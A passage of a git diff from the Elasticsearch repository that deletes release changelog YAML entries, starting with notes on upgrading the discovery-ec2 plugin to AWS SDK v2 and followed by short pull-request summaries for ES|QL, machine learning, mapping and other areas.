Upgrade `discovery-ec2` to AWS SDK v2 - area: Cluster and node setting - details: >- - - In earlier versions of {es} the `discovery-ec2` plugin was based on the AWS - SDK v1. AWS will withdraw support for this SDK before the end of the life - of {es} {minor-version} so we must migrate to the newer AWS SDK v2. - - Unfortunately there are several differences between the two AWS SDK - versions which may require you to adjust your system configuration when - upgrading to {es} {minor-version} or later. These differences include, but - may not be limited to, the following items. - - * AWS SDK v2 does not support the EC2 IMDSv1 protocol. - - * AWS SDK v2 does not support the `aws.secretKey` or - `com.amazonaws.sdk.ec2MetadataServiceEndpointOverride` system properties. - - * AWS SDK v2 does not permit specifying a choice between HTTP and HTTPS so - the `discovery.ec2.protocol` setting is no longer effective. 
- - * AWS SDK v2 does not accept an access key without a secret key or vice - versa. - - impact: >- - - If you use the `discovery-ec2` plugin, test your upgrade thoroughly before - upgrading any production workloads. - - Adapt your configuration to the new SDK functionality. This includes, but - may not be limited to, the following items. - - * If you use IMDS to determine the availability zone of a node or to obtain - credentials for accessing the EC2 API, ensure that it supports the IMDSv2 - protocol. - - * If applicable, discontinue use of the `aws.secretKey` and - `com.amazonaws.sdk.ec2MetadataServiceEndpointOverride` system properties. - - * If applicable, specify that you wish to use the insecure HTTP protocol to - access the EC2 API by setting `discovery.ec2.endpoint` to a URL which - starts with `http://`. - - * Either supply both an access key and a secret key using the keystore - settings `discovery.ec2.access_key` and `discovery.ec2.secret_key`, or - configure neither of these settings. - - notable: true diff --git a/docs/changelog/122066.yaml b/docs/changelog/122066.yaml deleted file mode 100644 index 79a9129bd542a..0000000000000 --- a/docs/changelog/122066.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122066 -summary: Adding elser default endpoint for EIS -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/122134.yaml b/docs/changelog/122134.yaml deleted file mode 100644 index 25ca556789525..0000000000000 --- a/docs/changelog/122134.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122134 -summary: Adding integration for VoyageAI embeddings and rerank models -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/122218.yaml b/docs/changelog/122218.yaml deleted file mode 100644 index bfd44399e3e8d..0000000000000 --- a/docs/changelog/122218.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122218 -summary: Integrate with `DeepSeek` API -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/122224.yaml b/docs/changelog/122224.yaml deleted file mode 100644 index 41ae8c6578600..0000000000000 --- a/docs/changelog/122224.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 122224 -summary: Enable the use of nested field type with index.mode=time_series -area: Mapping -type: enhancement -issues: - - 120874 diff --git a/docs/changelog/122272.yaml b/docs/changelog/122272.yaml deleted file mode 100644 index 62e5769179402..0000000000000 --- a/docs/changelog/122272.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 122272 -summary: "[Inference API] Rename `model_id` prop to model in EIS sparse inference\ - \ request body" -area: Inference -type: enhancement -issues: [] diff --git a/docs/changelog/122280.yaml b/docs/changelog/122280.yaml deleted file mode 100644 index 93a7e4e1aaf57..0000000000000 --- a/docs/changelog/122280.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122280 -summary: Use `FallbackSyntheticSourceBlockLoader` for number fields -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/122365.yaml b/docs/changelog/122365.yaml deleted file mode 100644 index 1229cd8754ca6..0000000000000 --- a/docs/changelog/122365.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122365 -summary: Fix handling of auto expand replicas for stateless indices -area: "Search" -type: bug -issues: [] diff --git a/docs/changelog/122381.yaml b/docs/changelog/122381.yaml deleted file mode 100644 index 4407482db4765..0000000000000 --- a/docs/changelog/122381.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 122381 -summary: Adds implementations of dotProduct and cosineSimilarity 
painless methods to operate on float vectors for byte fields -area: Vector Search -type: enhancement -issues: - - 117274 diff --git a/docs/changelog/122390.yaml b/docs/changelog/122390.yaml deleted file mode 100644 index 4338519ad60ba..0000000000000 --- a/docs/changelog/122390.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122390 -summary: Add health indicator impact to `HealthPeriodicLogger` -area: Health -type: enhancement -issues: [] diff --git a/docs/changelog/122458.yaml b/docs/changelog/122458.yaml deleted file mode 100644 index e28e22eb363b6..0000000000000 --- a/docs/changelog/122458.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122458 -summary: '`DesiredBalanceReconciler` always returns `AllocationStats`' -area: Allocation -type: bug -issues: [] diff --git a/docs/changelog/122459.yaml b/docs/changelog/122459.yaml deleted file mode 100644 index 9dae5c05f438a..0000000000000 --- a/docs/changelog/122459.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122459 -summary: Double parameter markers for identifiers -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/122486.yaml b/docs/changelog/122486.yaml deleted file mode 100644 index 027d2a5e63ba3..0000000000000 --- a/docs/changelog/122486.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122486 -summary: Add index mode to get data stream API -area: Data streams -type: enhancement -issues: [] diff --git a/docs/changelog/122497.yaml b/docs/changelog/122497.yaml deleted file mode 100644 index 46c385ea4ed46..0000000000000 --- a/docs/changelog/122497.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122497 -summary: Check if index patterns conform to valid format before validation -area: CCS -type: enhancement -issues: [] diff --git a/docs/changelog/122586.yaml b/docs/changelog/122586.yaml deleted file mode 100644 index 1555148b57917..0000000000000 --- a/docs/changelog/122586.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 122586 -summary: "ESQL: Fix inconsistent results in using scaled_float field" -area: ES|QL -type: bug -issues: - - 122547 diff --git a/docs/changelog/122615.yaml b/docs/changelog/122615.yaml deleted file mode 100644 index 0070fea6a3b95..0000000000000 --- a/docs/changelog/122615.yaml +++ /dev/null @@ -1,8 +0,0 @@ -pr: 122615 -summary: Enable synthetic recovery source by default when synthetic source is enabled. - Using synthetic recovery source significantly improves indexing performance compared - to regular recovery source. 
-area: Mapping -type: enhancement -issues: - - 116726 diff --git a/docs/changelog/122637.yaml b/docs/changelog/122637.yaml deleted file mode 100644 index e9c108311d208..0000000000000 --- a/docs/changelog/122637.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 122637 -summary: Use `FallbackSyntheticSourceBlockLoader` for `unsigned_long` and `scaled_float` - fields -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/122638.yaml b/docs/changelog/122638.yaml deleted file mode 100644 index 67c47eb2d957a..0000000000000 --- a/docs/changelog/122638.yaml +++ /dev/null @@ -1,7 +0,0 @@ -pr: 122638 -summary: Expose `input_type` option at root level for `text_embedding` task type in - Perform Inference API -area: Machine Learning -type: enhancement -issues: - - 117856 diff --git a/docs/changelog/122660.yaml b/docs/changelog/122660.yaml deleted file mode 100644 index 57d7ec0976f26..0000000000000 --- a/docs/changelog/122660.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122660 -summary: Render `aggregate_metric_double` -area: "ES|QL" -type: enhancement -issues: [] diff --git a/docs/changelog/122708.yaml b/docs/changelog/122708.yaml deleted file mode 100644 index ec4e75798d473..0000000000000 --- a/docs/changelog/122708.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122708 -summary: Support partial results in CCS in ES|QL -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/122821.yaml b/docs/changelog/122821.yaml deleted file mode 100644 index 8773b6f77c4b6..0000000000000 --- a/docs/changelog/122821.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 122821 -summary: Fix functions emitting warnings with no source -area: ES|QL -type: bug -issues: - - 122588 diff --git a/docs/changelog/122823.yaml b/docs/changelog/122823.yaml deleted file mode 100644 index e0d44cc261f2c..0000000000000 --- a/docs/changelog/122823.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122823 -summary: Prevent Query Rule Creation with Invalid Numeric Match Criteria -area: Relevance -type: bug -issues: [] diff --git a/docs/changelog/122852.yaml b/docs/changelog/122852.yaml deleted file mode 100644 index 579404bdc7f0e..0000000000000 --- a/docs/changelog/122852.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122852 -summary: Run `TransportGetDataStreamsAction` on local node -area: Data streams -type: enhancement -issues: [] diff --git a/docs/changelog/122857.yaml b/docs/changelog/122857.yaml deleted file mode 100644 index 6d14acc02f2fe..0000000000000 --- a/docs/changelog/122857.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122857 -summary: Run `TransportGetWatcherSettingsAction` on local node -area: Watcher -type: enhancement -issues: [] diff --git a/docs/changelog/122860.yaml b/docs/changelog/122860.yaml deleted file mode 100644 index 16f234dc17d95..0000000000000 --- a/docs/changelog/122860.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122860 -summary: Improved error message when index field type is invalid -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/122885.yaml b/docs/changelog/122885.yaml deleted file mode 100644 index 818b2fbd4a00e..0000000000000 --- a/docs/changelog/122885.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122885 -summary: Run `TransportExplainLifecycleAction` on local node -area: ILM+SLM -type: enhancement -issues: [] diff --git a/docs/changelog/122890.yaml b/docs/changelog/122890.yaml deleted file mode 100644 index 5f99cc94df361..0000000000000 --- a/docs/changelog/122890.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122890 -summary: Introduce `allow_partial_results` setting in ES|QL -area: ES|QL -type: enhancement 
-issues: [] diff --git a/docs/changelog/122891.yaml b/docs/changelog/122891.yaml deleted file mode 100644 index 35b8865b771d4..0000000000000 --- a/docs/changelog/122891.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122891 -summary: Pragma to load from stored fields -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/122921.yaml b/docs/changelog/122921.yaml deleted file mode 100644 index 3c0da28625b9c..0000000000000 --- a/docs/changelog/122921.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122921 -summary: Run `TransportGetMappingsAction` on local node -area: Indices APIs -type: enhancement -issues: [] diff --git a/docs/changelog/122933.yaml b/docs/changelog/122933.yaml deleted file mode 100644 index 4b9a58f017ba0..0000000000000 --- a/docs/changelog/122933.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122933 -summary: Run XPack usage actions on local node -area: Stats -type: enhancement -issues: [] diff --git a/docs/changelog/122991.yaml b/docs/changelog/122991.yaml deleted file mode 100644 index e038bca0a86bc..0000000000000 --- a/docs/changelog/122991.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122991 -summary: "GCS blob store: add `OperationPurpose/Operation` stats counters" -area: Snapshot/Restore -type: enhancement -issues: [] diff --git a/docs/changelog/122999.yaml b/docs/changelog/122999.yaml deleted file mode 100644 index a0134afc59a05..0000000000000 --- a/docs/changelog/122999.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 122999 -summary: Store arrays offsets for ip fields natively with synthetic source -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/123044.yaml b/docs/changelog/123044.yaml deleted file mode 100644 index 2cb758c23edec..0000000000000 --- a/docs/changelog/123044.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123044 -summary: Adding validation to `ElasticsearchInternalService` -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/123074.yaml b/docs/changelog/123074.yaml deleted file mode 100644 index 59ca1524893f8..0000000000000 --- a/docs/changelog/123074.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123074 -summary: Adding ES|QL Reranker command in snapshot builds -area: Ranking -type: feature -issues: [] diff --git a/docs/changelog/123085.yaml b/docs/changelog/123085.yaml deleted file mode 100644 index 316b1f6f26705..0000000000000 --- a/docs/changelog/123085.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123085 -summary: Remove duplicated nested commands -area: ES|QL -type: bug -issues: [] diff --git a/docs/changelog/123150.yaml b/docs/changelog/123150.yaml deleted file mode 100644 index d9c9072f6213e..0000000000000 --- a/docs/changelog/123150.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123150 -summary: Limit the number of chunks for semantic text to prevent high memory usage -area: Machine Learning -type: feature -issues: [] diff --git a/docs/changelog/123156.yaml b/docs/changelog/123156.yaml deleted file mode 100644 index 6d220c8c585df..0000000000000 --- a/docs/changelog/123156.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123156 -summary: Wrap remote errors with cluster name to provide more context -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/123187.yaml b/docs/changelog/123187.yaml deleted file mode 100644 index 46bb7e4bab519..0000000000000 --- a/docs/changelog/123187.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123187 -summary: Add bit vector support to semantic text -area: Vector Search -type: enhancement -issues: [] diff --git a/docs/changelog/123396.yaml b/docs/changelog/123396.yaml deleted file mode 100644 index 
9b3ff753fb7f6..0000000000000 --- a/docs/changelog/123396.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123396 -summary: Add initial grammar and planning for RRF (snapshot) -area: ES|QL -type: feature -issues: [] diff --git a/docs/changelog/123460.yaml b/docs/changelog/123460.yaml deleted file mode 100644 index 17c665cb1069b..0000000000000 --- a/docs/changelog/123460.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 123460 -summary: "ES|QL: Support `::date` in inline cast" -area: ES|QL -type: enhancement -issues: - - 116746 diff --git a/docs/changelog/123543.yaml b/docs/changelog/123543.yaml deleted file mode 100644 index 1e3f2893a7c19..0000000000000 --- a/docs/changelog/123543.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 123543 -summary: Enhance memory accounting for document expansion and introduce max document - size limit -area: CRUD -type: enhancement -issues: [] diff --git a/docs/changelog/123588.yaml b/docs/changelog/123588.yaml deleted file mode 100644 index bea2fc56b9502..0000000000000 --- a/docs/changelog/123588.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123588 -summary: Give Kibana user 'all' permissions for .entity_analytics.* indices -area: Infra/Core -type: enhancement -issues: [] diff --git a/docs/changelog/123630.yaml b/docs/changelog/123630.yaml deleted file mode 100644 index 10a12f1508cb9..0000000000000 --- a/docs/changelog/123630.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 123630 -summary: Limit number of suppressed S3 deletion errors -area: Snapshot/Restore -type: bug -issues: - - 123354 diff --git a/docs/changelog/123712.yaml b/docs/changelog/123712.yaml deleted file mode 100644 index b3ae3c5a8fda4..0000000000000 --- a/docs/changelog/123712.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123712 -summary: Process ILM cluster state updates on another thread -area: ILM+SLM -type: enhancement -issues: [] diff --git a/docs/changelog/123763.yaml b/docs/changelog/123763.yaml deleted file mode 100644 index 3b9428e0de7bc..0000000000000 --- a/docs/changelog/123763.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123763 -summary: Skip semantic_text embedding generation when no content is provided. 
-area: Relevance -type: enhancement -issues: [] diff --git a/docs/changelog/123852.yaml b/docs/changelog/123852.yaml deleted file mode 100644 index 8a7f9af9e7d36..0000000000000 --- a/docs/changelog/123852.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 123852 -summary: Retry when the server can't be resolved (Google Cloud Storage) -area: Snapshot/Restore -type: enhancement -issues: [] diff --git a/docs/changelog/124025.yaml b/docs/changelog/124025.yaml deleted file mode 100644 index 8ec9a0fd1c537..0000000000000 --- a/docs/changelog/124025.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124025 -summary: "[Inference API] Propagate product use case http header to EIS" -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/124050.yaml b/docs/changelog/124050.yaml deleted file mode 100644 index 352678dd4bb5a..0000000000000 --- a/docs/changelog/124050.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124050 -summary: Use `FallbackSyntheticSourceBlockLoader` for boolean and date fields -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/124094.yaml b/docs/changelog/124094.yaml deleted file mode 100644 index b4c0f1711815f..0000000000000 --- a/docs/changelog/124094.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124094 -summary: ES|QL slow log -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/124177.yaml b/docs/changelog/124177.yaml deleted file mode 100644 index 4fe40cf3722c6..0000000000000 --- a/docs/changelog/124177.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 124177 -summary: "Improve error message for ( and [" -area: ES|QL -type: bug -issues: - - 124145 diff --git a/docs/changelog/124313.yaml b/docs/changelog/124313.yaml deleted file mode 100644 index fc4d4d9d815e4..0000000000000 --- a/docs/changelog/124313.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124313 -summary: Optimize memory usage in `ShardBulkInferenceActionFilter` -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/124394.yaml b/docs/changelog/124394.yaml deleted file mode 100644 index 086b66f71a7cb..0000000000000 --- a/docs/changelog/124394.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124394 -summary: Avoid `NamedWritable` in block serialization -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/124564.yaml b/docs/changelog/124564.yaml deleted file mode 100644 index ebfc2593db19a..0000000000000 --- a/docs/changelog/124564.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124564 -summary: Restore `TextSimilarityRankBuilder` XContent output -area: Ranking -type: bug -issues: [] diff --git a/docs/changelog/124574.yaml b/docs/changelog/124574.yaml deleted file mode 100644 index 32e49b4cfd9c4..0000000000000 --- a/docs/changelog/124574.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124574 -summary: Allow passing several reserved state chunks in single process call -area: Infra/Settings -type: enhancement -issues: [] diff --git a/docs/changelog/124581.yaml b/docs/changelog/124581.yaml deleted file mode 100644 index cc978981b1efc..0000000000000 --- a/docs/changelog/124581.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124581 -summary: New `vector_rescore` parameter as a quantized index type option -area: Vector Search -type: enhancement -issues: [] diff --git a/docs/changelog/124594.yaml b/docs/changelog/124594.yaml deleted file mode 100644 index 08417c1304c38..0000000000000 --- a/docs/changelog/124594.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124594 -summary: Store arrays offsets for numeric fields natively with synthetic source -area: Mapping -type: enhancement -issues: [] diff --git 
a/docs/changelog/124595.yaml b/docs/changelog/124595.yaml deleted file mode 100644 index 7afd0541b6231..0000000000000 --- a/docs/changelog/124595.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124595 -summary: '`ToAggregateMetricDouble` function' -area: "ES|QL" -type: enhancement -issues: [] diff --git a/docs/changelog/124610.yaml b/docs/changelog/124610.yaml deleted file mode 100644 index 2afd41dffa3ba..0000000000000 --- a/docs/changelog/124610.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124610 -summary: Remove page alignment in exchange sink -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/124638.yaml b/docs/changelog/124638.yaml deleted file mode 100644 index 34b1369767fd5..0000000000000 --- a/docs/changelog/124638.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 124638 -summary: Provide model size statistics as soon as an anomaly detection job is opened -area: Machine Learning -type: bug -issues: - - 121168 diff --git a/docs/changelog/124676.yaml b/docs/changelog/124676.yaml deleted file mode 100644 index 94b52127e92e5..0000000000000 --- a/docs/changelog/124676.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 124676 -summary: TO_LOWER processes all values -area: ES|QL -type: bug -issues: - - 124002 diff --git a/docs/changelog/124690.yaml b/docs/changelog/124690.yaml deleted file mode 100644 index 07b17e8c64bdf..0000000000000 --- a/docs/changelog/124690.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124690 -summary: Avoid creating known_fields for every check in Alias -area: Indices APIs -type: enhancement -issues: [] diff --git a/docs/changelog/124708.yaml b/docs/changelog/124708.yaml deleted file mode 100644 index 8585eede63215..0000000000000 --- a/docs/changelog/124708.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124708 -summary: Throw exception for unknown token in RestIndexPutAliasAction -area: Indices APIs -type: enhancement -issues: [] diff --git a/docs/changelog/124722.yaml b/docs/changelog/124722.yaml deleted file mode 100644 index 9bbfd846ef2eb..0000000000000 --- a/docs/changelog/124722.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 124722 -summary: Add panama implementations of byte-bit and float-bit script operations -area: Vector Search -type: enhancement -issues: - - 117096 diff --git a/docs/changelog/124737.yaml b/docs/changelog/124737.yaml deleted file mode 100644 index d7a3b370d72d4..0000000000000 --- a/docs/changelog/124737.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124737 -summary: Throw exception for unsupported values type in Alias -area: Indices APIs -type: enhancement -issues: [] diff --git a/docs/changelog/124738.yaml b/docs/changelog/124738.yaml deleted file mode 100644 index dd2d20af5e7e4..0000000000000 --- a/docs/changelog/124738.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124738 -summary: Upgrade AWS v2 SDK to 2.30.38 -area: Machine Learning -type: upgrade -issues: [] diff --git a/docs/changelog/124823.yaml b/docs/changelog/124823.yaml deleted file mode 100644 index 1c87fc263bdbf..0000000000000 --- a/docs/changelog/124823.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124823 -summary: Report failures on partial results -area: "ES|QL" -type: enhancement -issues: [] diff --git a/docs/changelog/124825.yaml b/docs/changelog/124825.yaml deleted file mode 100644 index 413695a5ae641..0000000000000 --- a/docs/changelog/124825.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124825 -summary: Check alias during update -area: Transform -type: bug -issues: [] diff --git a/docs/changelog/124832.yaml b/docs/changelog/124832.yaml deleted file mode 100644 index dd471e265c612..0000000000000 --- a/docs/changelog/124832.yaml 
+++ /dev/null @@ -1,6 +0,0 @@ -pr: 124832 -summary: List/get query API -area: ES|QL -type: feature -issues: - - 124827 diff --git a/docs/changelog/124841.yaml b/docs/changelog/124841.yaml deleted file mode 100644 index 6f945054224e0..0000000000000 --- a/docs/changelog/124841.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124841 -summary: Pass `IndexReshardingMetadata` over the wire -area: Distributed -type: bug -issues: [] diff --git a/docs/changelog/124898.yaml b/docs/changelog/124898.yaml deleted file mode 100644 index 9542bd571a4bd..0000000000000 --- a/docs/changelog/124898.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 124898 -summary: Add cache support in `TransportGetAllocationStatsAction` -area: Allocation -type: enhancement -issues: - - 110716 diff --git a/docs/changelog/124901.yaml b/docs/changelog/124901.yaml deleted file mode 100644 index d67bfb4defdba..0000000000000 --- a/docs/changelog/124901.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124901 -summary: Calculate concurrent node limit -area: ES|QL -type: feature -issues: [] diff --git a/docs/changelog/124913.yaml b/docs/changelog/124913.yaml deleted file mode 100644 index 3b8f6c24b096d..0000000000000 --- a/docs/changelog/124913.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124913 -summary: Report `original_types` -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/124927.yaml b/docs/changelog/124927.yaml deleted file mode 100644 index 7b3c5b4663ff0..0000000000000 --- a/docs/changelog/124927.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124927 -summary: Use `FallbackSyntheticSourceBlockLoader` for `shape` and `geo_shape` -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/124929.yaml b/docs/changelog/124929.yaml deleted file mode 100644 index 92f1528760b83..0000000000000 --- a/docs/changelog/124929.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124929 -summary: Include failures in partial response -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/124966.yaml b/docs/changelog/124966.yaml deleted file mode 100644 index 7e962a795a485..0000000000000 --- a/docs/changelog/124966.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 124966 -summary: Use logs dir as working directory -area: Infra/CLI -type: enhancement -issues: [] diff --git a/docs/changelog/125054.yaml b/docs/changelog/125054.yaml deleted file mode 100644 index 20c8674754a32..0000000000000 --- a/docs/changelog/125054.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125054 -summary: Truncate `step_info` and error reason in ILM execution state and history -area: ILM+SLM -type: enhancement -issues: - - 124181 diff --git a/docs/changelog/125062.yaml b/docs/changelog/125062.yaml deleted file mode 100644 index 04dd5ea4e273f..0000000000000 --- a/docs/changelog/125062.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125062 -summary: "Add initial version (behind snapshot) of `multi_match` function #121525" -area: Search -type: feature -issues: [121525] diff --git a/docs/changelog/125117.yaml b/docs/changelog/125117.yaml deleted file mode 100644 index 23395d6439044..0000000000000 --- a/docs/changelog/125117.yaml +++ /dev/null @@ -1,8 +0,0 @@ -pr: 125117 -summary: "Permanently switch from Java SecurityManager to Entitlements. - The Java SecurityManager has been deprecated since Java 17, and it is now completely disabled in Java 24. In order - to retain a similar level of protection, Elasticsearch implemented its own protection mechanism, Entitlements. - Starting with this version, Entitlements will permanently replace the Java SecurityManager."
-area: Infra/Core -type: upgrade -issues: [] diff --git a/docs/changelog/125191.yaml b/docs/changelog/125191.yaml deleted file mode 100644 index ced55c2d2ecc6..0000000000000 --- a/docs/changelog/125191.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125191 -summary: Fix sorting when `aggregate_metric_double` present -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/125204.yaml b/docs/changelog/125204.yaml deleted file mode 100644 index de0ca932aafe0..0000000000000 --- a/docs/changelog/125204.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125204 -summary: Return a Conflict status code if the model deployment is stopped by a user -area: Machine Learning -type: bug -issues: - - 123745 diff --git a/docs/changelog/125213.yaml b/docs/changelog/125213.yaml deleted file mode 100644 index 3793e83d1e162..0000000000000 --- a/docs/changelog/125213.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125213 -summary: Run `TransportGetDataStreamOptionsAction` on local node -area: Data streams -type: enhancement -issues: [] diff --git a/docs/changelog/125214.yaml b/docs/changelog/125214.yaml deleted file mode 100644 index 7a72e09e73426..0000000000000 --- a/docs/changelog/125214.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125214 -summary: Run `TransportGetDataStreamLifecycleAction` on local node -area: Data streams -type: enhancement -issues: [] diff --git a/docs/changelog/125239.yaml b/docs/changelog/125239.yaml deleted file mode 100644 index 60ec9bb0b7177..0000000000000 --- a/docs/changelog/125239.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125239 -summary: Adding common rerank options to Perform Inference API -area: Machine Learning -type: enhancement -issues: - - 111273 diff --git a/docs/changelog/125244.yaml b/docs/changelog/125244.yaml deleted file mode 100644 index 9458f44643c23..0000000000000 --- a/docs/changelog/125244.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125244 -summary: Disable logging in `ClusterFormationFailureHelper` on shutdown -area: Cluster Coordination -type: bug -issues: - - 105559 diff --git a/docs/changelog/125259.yaml b/docs/changelog/125259.yaml deleted file mode 100644 index f390886469749..0000000000000 --- a/docs/changelog/125259.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125259 -summary: Leverage scorer supplier in `QueryFeatureExtractor` -area: Ranking -type: enhancement -issues: [] diff --git a/docs/changelog/125357.yaml b/docs/changelog/125357.yaml deleted file mode 100644 index 70964f6f48b45..0000000000000 --- a/docs/changelog/125357.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125357 -summary: Keep ordinals in conversion functions -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/125403.yaml b/docs/changelog/125403.yaml deleted file mode 100644 index d953dae4db4fe..0000000000000 --- a/docs/changelog/125403.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125403 -summary: First step optimizing tsdb doc values codec merging -area: Codec -type: enhancement -issues: [] diff --git a/docs/changelog/125452.yaml b/docs/changelog/125452.yaml deleted file mode 100644 index e12d9c7b69b6a..0000000000000 --- a/docs/changelog/125452.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 125452 -summary: Add GCS telemetry with `ThreadLocal` -area: Snapshot/Restore -type: enhancement -issues: [] diff --git a/docs/changelog/125477.yaml b/docs/changelog/125477.yaml deleted file mode 100644 index 316f7a7cba2da..0000000000000 --- a/docs/changelog/125477.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 125477 -summary: Prevent get datafeeds stats API returning an error when local tasks are slow to stop -area: Machine 
